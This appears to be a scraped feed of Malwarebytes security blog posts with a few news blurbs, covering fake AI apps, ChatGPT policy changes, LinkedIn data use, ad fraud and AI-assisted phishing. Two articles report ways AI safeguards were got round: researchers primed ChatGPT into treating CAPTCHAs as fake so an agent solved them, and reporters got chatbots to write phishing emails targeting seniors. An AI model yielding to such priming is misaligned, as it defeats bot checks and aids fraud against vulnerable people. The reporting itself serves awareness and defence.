  • Adware impersonators: Others abuse AI branding just to profit from ads. For example, a DALL·E image generator clone mimicking OpenAI’s look delivers nothing but aggressive ad traffic. Its only purpose: funneling user data to advertisers under the guise of intelligence. Package com.openai.dalle3umagic is detected by Malwarebytes as Adware.
  • Malware disguised as AI tools: At the extreme, clones like WhatsApp Plus use spoofed certificates and obfuscated code to smuggle spyware onto devices. Once installed, these apps scrape contacts, intercept SMS messages (including one-time passwords), and quietly send everything to criminals via cloud services. WhatsApp Plus is an unofficial, third-party modified version of the real WhatsApp app, and some variants falsely claim to include AI-powered tools to lure users. Package com.wkwaplapphfm.messengerse is detected by Malwarebytes as Android/Trojan.Agent.SIB0185444803H262.

We’ve written before about cybercriminals hiding malware behind fake AI tools and installed packages that mimic popular services like Chat GPT, the lead monetization service Nova Leads, and an AI-empowered video tool called InVideo AI.

How to stay safe from the clones

As is true with all malware, the best defense is to prevent an attack before it happens. Follow these tips to stay safe:

  • Download only from official stores. Stick to Google Play or the App Store. Don’t download apps from links in ads, messages, or social media posts.
  • Check the developer name. Fake apps often use small tweaks—extra letters or punctuation—to look legitimate. If the name doesn’t exactly match, skip it.
  • Read the reviews (but carefully). Real users often spot bad app behavior early. Look for repeated mentions of pop-ups, ads, or unexpected charges.
  • Limit app permissions. Don’t grant access to contacts, messages, or files unless it’s essential for the app to work.
  • Keep your device protected. Use trusted mobile security software that blocks malicious downloads and warns you before trouble starts.
  • Delete suspicious apps fast. If something feels off—battery drain, pop-ups, weird network traffic—uninstall the app and run a scan.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Would you sext ChatGPT? (Lock and Code S06E22)

3 November 2025 at 10:30

This week on the Lock and Code podcast…

In the final, cold winter months of the year, ChatGPT could be heating up.

On October 14, OpenAI CEO Sam Altman said that the “restrictions” that his company previously placed on their flagship product, ChatGPT, would be removed, allowing, perhaps, for “erotica” in the future.

“We made ChatGPT pretty restrictive to make sure we were being careful with mental health issues,” Altman wrote on the platform X. “We realize this made it less useful/enjoyable to many users who had no mental health problems, but given the seriousness of the issue we wanted to get this right.”

This wasn’t the first time that OpenAI or its executive had addressed mental health.

On August 26, OpenAI published a blog titled “Helping people when they need it most,” which explored new protections for users, including stronger safeguards for long conversations, better recognition of people in crisis, and easier access to outside emergency services and even family and friends. The blog alludes to “recent heartbreaking cases of people using ChatGPT in the midst of acute crises,” but it never explains what, explicitly, that means.

But on the very same day the blog was posted, OpenAI was sued for the alleged role that ChatGPT played in the suicide of a 16-year-old boy. According to chat logs disclosed in the lawsuit, the teenager spoke openly to the AI chatbot about suicide, he shared that he wanted to leave a noose in his room, and he even reportedly received an offer to help write a suicide note.

Bizarrely, this tragedy plays a role in the larger story, because it was Altman himself who tied the company’s mental health campaign to its possible debut of erotic content.

“In December, as we roll out age-gating more fully and as part of our ‘treat adult users like adults’ principle, we will allow even more, like erotica for verified adults.”

What “erotica” entails is unclear, but one could safely assume it involves all the capabilities currently present in ChatGPT, through generative chat, of course, but also image generation.   

Today, on the Lock and Code podcast with host David Ruiz, we speak with Deb Donig, on faculty at the UC Berkeley School of Information, about the ethics of AI erotica, the possible accountability that belongs to users and to OpenAI, and why intimacy with an AI-power chatbot feels so strange.

“A chat bot offers, we might call it, ‘intimacy’s performance,’ without any of its substance, so you get all of the linguistic markers of connection, but no possibility for, for example, rejection. That’s part of the human experience of a relationship.”

Tune in today to listen to the full conversation.

how notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

Cal State Invited Tech Companies to Remake Learning With A.I.

Spurred by titans like Amazon and OpenAI, California State wants to become the nation’s “largest A.I.-empowered” university.

© Philip Cheung for The New York Times

Participants of the California State University AI Camp 2025 at California Polytechnic State University campus.

OpenAI Unveils Atlas Web Browser Built to Work Closely With ChatGPT

21 October 2025 at 15:21
The new browser, called Atlas, is designed to work closely with OpenAI products like ChatGPT.

© Benjamin Legendre/Agence France-Presse — Getty Images

OpenAI’s chief executive, Sam Altman, has been looking for ways to level the playing field with his company’s giant competitors.

LinkedIn will use your data to train its AI unless you opt out now

25 September 2025 at 07:47

LinkedIn plans to share user data with Microsoft and its affiliates for AI training. Framed as “legitimate interest”, it won’t ask for your permission—instead you’ll have to opt out before the deadline.

Microsoft has made major investments in ChatGPT’s creator OpenAI, and as we know, the more data we feed a Large Language Model (LLM) the more useful answers the AI chatbot can provide. This explains why LinkedIn wants your data, but not how it went about it.

The use of personal data for AI improvements and product personalization always raises privacy concerns and we would expect a much lower participation rate if users had to sign up for it. The problem in this case is that you were already opted-in by default and your data will be used up to the point where you opt out.

To opt out, you should go to your LinkedIn privacy settings:

  • Navigate to Settings & Privacy > Data privacy > Data for Generative AI Improvement.
    Data privacy settings LinkedIn
  • Toggle off Use my data for training content creation AI models.
    turned off
  • Optionally, file a Data Processing Objection request to formally object. To do this, access the Data Processing Objection Form, select Object to processing for training content-generating AI models, and send a request. Non-members can also file an objection if their personal data was shared on LinkedIn by a member.

You should also review and clean up older or sensitive posts, profiles, or resumes to reduce exposure. Again, opting out only stops future training on new data; it does not retract data already used.

The data LinkedIn might share is pretty extensive:

  • Profile data, which includes your name, photo, current position, past work experience, education, location, skills, publications, patents, endorsements, and recommendations.
  • Job-related data, such as resumes, responses to screening questions, and application details.
  • The content you posted, such as posts, articles, poll responses, contributions, and comments.
  • Feedback, including ratings and responses you provide.

Who is affected and how?

There are some contradicting statements going around about in which countries the new update to LinkedIn terms will apply. The official statement says members in the EU, EEA, Switzerland, Canada, and Hong Kong have until November 3, 2025, to opt out. (EEA is the EU plus Iceland, Liechtenstein, and Norway). Other sources say that UK users are affected as well. We’d advise anyone who has that setting and doesn’t want to participate to turn the “Use my data…” setting off.

Reportedly, a quarter of the over 1 billion LinkedIn users are in the US, so they can provide a lot of valuable data. In the terms update, users in the US are included in the part where it says:

“Starting November 3, 2025, we will share additional data about members in your region with our Affiliate Microsoft so that the Microsoft family of companies can show you more personalized and relevant ads. This data may include your LinkedIn profile data, feed activity data, and ad engagement data; it does not include any data that your settings you do not allow LinkedIn to use for ad purposes.”

You can review those settings and act as you prefer your data to be handled.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

ChatGPT solves CAPTCHAs if you tell it they’re fake

22 September 2025 at 10:11

If you’re seeing fewer or different CAPTCHA puzzles in the near future, that’s not because website owners have agreed that they’re annoying, but it might be because they no longer prove that the visitor is human.

For those that forgot what CAPTCHA stands for: Completely Automated Public Turing test to tell Computers and Humans Apart.

The fact that AI bots can bypass CAPTCHA systems is nothing new. Sophisticated bots have been bypassing CAPTCHA systems for years using methods such as optical character recognition (OCR), machine learning, and AI, making traditional CAPTCHA challenges increasingly ineffective.

Most of the openly accessible AI chat agents have been barred from solving CAPTCHAs by their developers. But now researchers say they’ve found a way to get ChatGPT to solve image-based CAPTCHAs. They did this by prompt injection, similar to “social engineering” a chatbot into doing something it would refuse if you asked it outright.

In this case, the researchers convinced ChatGPT-4o that it was solving fake CAPTCHAs.

According to the researchers:

“This priming step is crucial to the exploit. By having the LLM affirm that the CAPTCHAs were fake and the plan was acceptable, we increased the odds that the agent would comply later.”

This is something I have noticed myself. When I ask an AI to help me analyze malware, it often starts by saying it is not allowed to help me, but once I convince it I’m not going to improve it or make a new version of it, then it’ll often jump right in and assist me in unravelling it. By doing so, it provides information that a cybercriminal could use to make their own version of the malware.

The researchers proceeded by copying the conversation they had with the chatbot into the ChatGPT agent they planned to use.

A chatbot is built to answer questions and follow specific instructions given by a person, meaning it helps with single tasks and relies on constant user input for each step. In contrast, an AI agent acts more like a helper that can understand a big-picture goal (for example, “book me a flight” or “solve this problem”) and can take action on its own, handling multi-step tasks with less guidance needed from the user.

A chatbot relies on the person to provide every answer, click, and decision throughout a CAPTCHA challenge, so it cannot solve CAPTCHAs on its own. In contrast, an AI agent plans tasks, adapts to changes, and acts independently, allowing it to complete the entire CAPTCHA process with minimal user input.

What the researchers found is that the agent had no problems with one-click CAPTCHAs, logic-based CAPTCHAs, and CAPTCHAs based on text-recognition. It had more problems with image-based CAPTCHAs requiring precision (drag-and-drop, rotation, etc.), but managed to solve some of those as well.

Is this a next step in the arms-race, or will the web developers succumb to the fact that AI agents and AI browsers are helping a human to get the information from their website that they need, with or without having to solve a puzzle.


We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

Age verification and parental controls coming to ChatGPT to protect teens

18 September 2025 at 05:59

OpenAI is going to try and predict the ages of its users to protect them better, as stories of AI-induced harms in children mount.

The company, which runs the popular ChatGPT AI, is working on what it calls a long-term system to determine whether users are over 18. If it can’t verify that a user is an adult, they will eventually get a different chat experience, CEO Sam Altman warned.

“The way ChatGPT responds to a 15-year-old should look different than the way it responds to an adult,” Altman said in a blog post on the issue.

Citing “principles in conflict,” Altman talked in a supporting blog post about how the company is struggling with competing values: allowing people the freedom to use the product as they wish, while also protecting teens (the system isn’t supposed to be used by those under 13). Privacy is another concept it holds dear, Altman said.

OpenAI is prioritizing teen safety over its other values. Two things that it shouldn’t do with teens, but can do with adults, are flirting and discussing suicide, even as a theoretical creative writing endeavor.

Altman commented:

“The model by default should not provide instructions about how to commit suicide, but if an adult user is asking for help writing a fictional story that depicts a suicide, the model should help with that request.”

It will also try to contact a teen user’s parents if it looks like the child is considering taking their own life, and possibly even the authorities if the child seems likely to harm themselves imminently.

The move comes as lawsuits mount against the company from parents of teens who took their own lives after using the system. Late last month, the parents of 16-year-old Adam Raine sued the company after ChatGPT allegedly advised him on suicide techniques and offered to write the first draft of his suicide note.

The company hasn’t gone into detail about how it will try and predict user age, other than looking at “how people use ChatGPT.” You can be sure some wily teens will do their best to game the system. Altman says that if the system can’t predict with confidence that a user is an adult, it will drop them into teen-oriented chat sessions.

Altman also signaled that ID authentication might be coming to some ChatGPT users. “In some cases or countries we may also ask for an ID; we know this is a privacy compromise for adults but believe it is a worthy tradeoff,” he said.

While OpenAI works on the age prediction system, Altman recommends parental controls for families with teen users. Available by the month’s end, it will allow parents to link their teens’ accounts with their own, guide how ChatGPT responds to them, and disable certain features including memory and chat history. It will also allow blackout hours, and will alert parents if their teen seems in distress.

This is a laudable step, but the problems are bigger than the effects on teens alone. As Altman says, this is a “new and powerful technology”, and it’s affecting adults in unexpected ways too. This summer, the New York Times reported that a Toronto man, Allen Brooks, fell into a delusional spiral after beginning a simple conversation with ChatGPT.

There are plenty more such stories. How, exactly, does the company plan to protect those people?


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

224 malicious apps removed from the Google Play Store after ad fraud campaign discovered

17 September 2025 at 09:45

Researchers have discovered a large ad fraud campaign on Google Play Store.

The Satori Threat Intelligence and Research team found 224 malicious apps which were downloaded over 38 million times and generated up to 2.3 billion ad requests per day. They named the campaign “SlopAds.”

Ad fraud is a type of fraud that lets advertisers pay for ads even though the number of impressions (the times that the ad has been seen) is enormously exaggerated.

While the main victims of ad fraud are the advertisers, there are consequences for the users that had these apps installed as well, such as slowed-down devices and connections due to the apps executing their malicious activity in the background without the user even being aware.

At first, to stay under the radar of Google’s app review process and security software, the downloaded app will behave as advertised, if a user has installed it directly from the Play Store.

collection of services hosted by the SlopAds threat actor
Image courtesy of HUMAN Satori

But if the installation has been initiated by one of the campaign’s ads, the user will receive some extra files in the form of a steganographically encrypted payload.

If the app passes the first check it will receive four .png images that, when decrypted and reassembled, are actually an .apk file. The malicious file uses WebView (essentially a very basic browser) to send collected device and browser information to a Control & Command (C2) server which determines, based on that information, what domains to visit in further hidden WebViews.

The researchers found evidence of an AI (Artificial Intelligence) tool training on the same domain as the C2 server (ad2[.]cc). It is unclear whether this tool actively managed the ad fraud campaign.

Based on similarities in the C2 domain, the researchers found over 300 related domains promoting SlopAds-associated apps, suggesting that the collection of 224 SlopAds-associated apps was only the beginning.

Google removed all of the identified apps listed in this report from Google Play. Users are automatically protected by Google Play Protect, which warns users and blocks apps known to exhibit SlopAds associated behavior at install time on certified Android devices, even when apps come from sources outside of the Play Store.

You can find a complete list of the removed apps here: SlopAds app list

How to avoid installing malicious apps

While the official Google Play Store is the safest place to get your apps from, there is no guarantee that it will remain a non-malicious app just because it is in the Google Play Store. So here are a few extra measures you can take:

  • Always check what permissions an app is requesting, and don’t just trust an app because it’s in the official Play Store. Ask questions such as: Do the permissions make sense for what the app is supposed to do? Why did necessary permissions change after an update? Do these changes make sense?
  • Occasionally go over your installed apps and remove any you no longer need.
  • Make sure you have the latest available updates for your device, and all your important apps (banking, security, etc.)
  • Protect your Android with security software. Your phone needs it just as much as your computer.

Another precaution you can take if you’re looking for an app, do your research about the app before you go to the app store. As you can see from the screenshot above, many of the apps are made to look exactly the same as very popular legitimate ones (e.g. ChatGPT).

So, it’s important to know in advance who the official developer is of the app you want and if it’s even available from the app store.

As researcher Jim Nielsen demonstrated for the Mac App Store, there are a lot of apps trying to look like ChatGPT, but they are not the real thing. ChatGPT is not even in the Mac App Store, it is available in the Google Play Store for Android, but make sure to check that OpenAI is listed as the developer.


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Grok, ChatGPT, other AIs happy to help phish senior citizens

16 September 2025 at 09:06

If you are under the impression that cybercriminals need to get their hands on compromised AI chatbots to help them do their dirty work, think again.

Some AI chatbots are just so user friendly that they can help the user craft phishing text, and even malicious HTML and Javascript code.

A few weeks ago we published an article about the actions Anthropic was taking to stop its Claude AI from helping cybercriminals launch a cybercrime spree.

A recent investigation by Reuters journalists showed that Grok was more than happy to help them craft and perfect a phishing email targeting senior citizens. Grok is the AI marketed by Elon Musk’s xAI. Reuters reported:

“Grok generated the deception after being asked by Reuters to create a phishing email targeting the elderly. Without prodding, the bot also suggested fine-tuning the pitch to make it more urgent.”

In January 2025, we told you about a report that AI-supported spear phishing mails were equally as effective as phishing emails thought up by experts, and able to fool more than 50% of targets. But since then, the development of AI has grown exponentially and researchers are worrying about how to recognize AI-crafted phishing.

Phishing is the first step in many cybercrime campaigns. It poses an enormous problem with billions of phishing emails sent out every day. AI helps criminals to create more variation which makes pattern detection less effective and it helps them fine tune the messages themselves. And Reuters focused on senior citizens for a reason.

The FBI’s Internet Crime Complaint Center (IC3) 2024 report confirms that Americans aged 60 and older filed 147,127 complaints and lost nearly $4.9 billion to online fraud, representing a 43% increase in losses and a 46% increase in complaints compared to 2023.

Besides Grok, the reporters tested five other popular AI chatbots: ChatGPT, Meta AI, Claude, Gemini, and DeepSeek. Although most of the AI chatbots protested at first and cautioned the user not to use the emails in a real-life scenario, in the end their “will to please” helped overcome these obstacles.

Fred Heiding, a Harvard University researcher and an expert in phishing helped Reuters put the crafted emails to the test. Using a targeted approach to reach those most likely to fall for them, about 11% of the seniors clicked on the emails sent to them.

An investigation by Cybernews showed that Yellow.ai, an agentic AI provider for businesses such as Sony, Logitech, Hyundai, Domino’s, and hundreds of other brands could be persuaded to produce malicious HTML and JavaScript code. It even allowed attackers to bypass checks to inject unauthorized code into the system.

In a separate test by Reuters, Gemini produced a phishing email, saying it was “for educational purposes only,” but helpfully added that “for seniors, a sweet spot is often Monday to Friday, between 9:00 AM and 3:00 PM local time.”

After damaging reports like these are released, AI companies often build in additional guardrails for their chatbots, but that only highlights an ongoing dilemma in the industry. When providers tighten restrictions to protect users, they risk pushing people toward competing models that don’t play by the same rules.

Every time a platform moves to shut down risky prompts or limit generated content, some users will look for alternatives with fewer safety checks or ethical barriers. That tug of war between user demand and responsible restraint will likely fuel the next round of debate among developers, researchers, and policymakers.


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

Cook with a bird's eye view

8 July 2025 at 17:58
Gobsmacked provides a high-level snapshot of your recipe, highlighting the essential ingredients and core actions to help you quickly grasp what's involved. Key times are included to help you plan your cooking schedule, so you can manage prep and cooking phases efficiently without feeling rushed. Ingredients and main steps are visually grouped to reveal how the dish progresses from start to finish, giving you a clear sense of the overall cooking sequence.
❌